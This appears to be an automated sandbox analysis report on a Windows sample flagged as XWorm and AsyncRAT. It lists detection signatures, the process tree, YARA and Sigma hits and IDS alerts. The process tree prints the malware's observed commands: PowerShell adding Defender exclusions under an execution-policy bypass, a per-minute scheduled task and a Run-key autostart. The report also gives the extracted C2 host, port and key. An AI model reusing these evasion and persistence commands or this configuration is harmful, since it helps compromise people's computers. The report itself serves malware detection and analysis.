
Windows Analysis Report
YgJ5inWPQO.exe

Overview

General Information

Sample name: YgJ5inWPQO.exe (renamed because original name is a hash value)
Original sample name: fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2.exe
Analysis ID: 1579069
MD5: abbb4a5a77f9cf1530d24710a621026c
SHA1: a8b3f3d965202dfd6b7a9cc10963c0cfccf35682
SHA256: fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2
Tags: exe, user-Chainskilabs

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • YgJ5inWPQO.exe (PID: 432 cmdline: "C:\Users\user\Desktop\YgJ5inWPQO.exe" MD5: ABBB4A5A77F9CF1530D24710A621026C)
    • YgJ5inWPQO.exe (PID: 5352 cmdline: "C:\Users\user\Desktop\YgJ5inWPQO.exe" MD5: ABBB4A5A77F9CF1530D24710A621026C)
      • cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5236 cmdline: attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3116 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5768 cmdline: attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 4568 cmdline: C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msedge.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\msedge.exe MD5: A3B7B97F81C08C56A79971799B793072)
          • powershell.exe (PID: 4932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7792 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4280 cmdline: C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dddd.exe (PID: 6476 cmdline: C:\Users\user\AppData\Local\Temp\dddd.exe MD5: 02C70D9D6696950C198DB93B7F6A835E)
          • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5012 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 5292 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • WerFault.exe (PID: 3576 cmdline: C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • System User.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • System User.exe (PID: 8160 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • System User.exe (PID: 2296 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • System User.exe (PID: 1976 cmdline: "C:\Users\user\AppData\Roaming\System User.exe" MD5: A3B7B97F81C08C56A79971799B793072)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | (none) | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
XWorm | Malware with a wide range of capabilities ranging from RAT to ransomware. | No Attribution | (none) | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["hope-asia.gl.at.ply.gg"], "Port": 35710, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
\Device\ConDrv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Roaming\System User.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\System User.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\System User.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1061b:$s6: VirtualBox
  • 0x10579:$s8: Win32_ComputerSystem
  • 0x12a7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12b1a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12c2f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x12179:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x42a4b:$s6: VirtualBox
  • 0x429a9:$s8: Win32_ComputerSystem
  • 0x44ead:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x44f4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x4505f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x445a9:$cnc4: POST / HTTP/1.1
00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x27a4b:$s6: VirtualBox
  • 0x279a9:$s8: Win32_ComputerSystem
  • 0x29ead:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x29f4a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x2a05f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x295a9:$cnc4: POST / HTTP/1.1
00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

Source | Rule | Description | Author | Strings
2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe81b:$s6: VirtualBox
  • 0xe779:$s8: Win32_ComputerSystem
  • 0x10c7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10d1a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10e2f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10379:$cnc4: POST / HTTP/1.1
2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1061b:$s6: VirtualBox
  • 0x10579:$s8: Win32_ComputerSystem
  • 0x12a7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12b1a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12c2f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x12179:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\System User.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msedge.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msedge.exe, ProcessId: 5560, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", ProcessId: 7792, ProcessName: schtasks.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe", ProcessId: 7792, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msedge.exe, ParentProcessId: 5560, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe', ProcessId: 4932, ProcessName: powershell.exe
Source: Process started | Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' | Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dddd.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dddd.exe, ParentProcessId: 6476, ParentProcessName: dddd.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 5012, ProcessName: cmd.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T19:03:21.950129+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.93.27 | 443 | TCP
2024-12-20T19:05:22.723190+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49838 | 147.185.221.183 | 35710 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\System User.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["hope-asia.gl.at.ply.gg"], "Port": 35710, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\System User.exe | ReversingLabs: Detection: 81%
Source: YgJ5inWPQO.exe | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\System User.exe | Joe Sandbox ML: detected
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: hope-asia.gl.at.ply.gg
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: 35710
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: <123456789>
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: <Xwormmm>
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: FakeSolara?
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: USB.exe
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: %AppData%
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack | String decryptor: System User.exe
Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49709 version: TLS 1.2
